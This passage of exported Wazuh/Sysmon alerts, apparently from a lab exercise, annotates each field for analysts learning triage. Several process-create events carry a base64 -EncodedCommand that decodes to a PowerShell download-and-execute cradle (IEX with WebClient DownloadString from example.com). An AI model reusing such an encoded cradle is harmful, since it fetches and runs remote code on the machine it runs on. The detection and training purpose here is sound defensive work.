User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:38:38.465 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bd6c-680a-7e0b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 14508 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_qxtyh4i4.l1m.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:38:38.465 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 75 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534323.1689878 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:38:40.8912001Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 284776 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:38:39.577
ProcessGuid: {94294ddc-bd6f-680a-840b-000000000e00}
ProcessId: 6508
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-bd6c-680a-7e0b-000000000e00}
ParentProcessId: 14508
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:38:39.577 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bd6f-680a-840b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 6508 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows PowerShell No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: PowerShell.EXE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x26584 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: Medium No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-bd6c-680a-7e0b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 14508 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 79 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534323.1697945 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:38:41.1587369Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 284778 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:38:41.132
ProcessGuid: {94294ddc-bd6f-680a-840b-000000000e00}
ProcessId: 6508
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_ue5td5oc.hr3.ps1
CreationUtcTime: 2025-04-24 22:38:41.132
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:38:41.132 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bd6f-680a-840b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 6508 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_ue5td5oc.hr3.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:38:41.132 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 76 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534327.1700710 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:38:45.1715994Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 284820 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:38:42.397
ProcessGuid: {94294ddc-bd72-680a-860b-000000000e00}
ProcessId: 15968
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-bd6f-680a-840b-000000000e00}
ParentProcessId: 6508
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:38:42.397 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bd72-680a-860b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 15968 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows PowerShell No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: PowerShell.EXE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x26584 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: Medium No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-bd6f-680a-840b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 6508 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 80 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534327.1708777 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:38:45.3727583Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 284823 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:38:45.358
ProcessGuid: {94294ddc-bd72-680a-860b-000000000e00}
ProcessId: 15968
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_55t22iid.tbx.ps1
CreationUtcTime: 2025-04-24 22:38:45.358
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:38:45.358 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bd72-680a-860b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 15968 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_55t22iid.tbx.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:38:45.358 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 77 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534330.1711546 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:38:48.2560190Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 284882 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:38:46.626
ProcessGuid: {94294ddc-bd76-680a-890b-000000000e00}
ProcessId: 16036
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
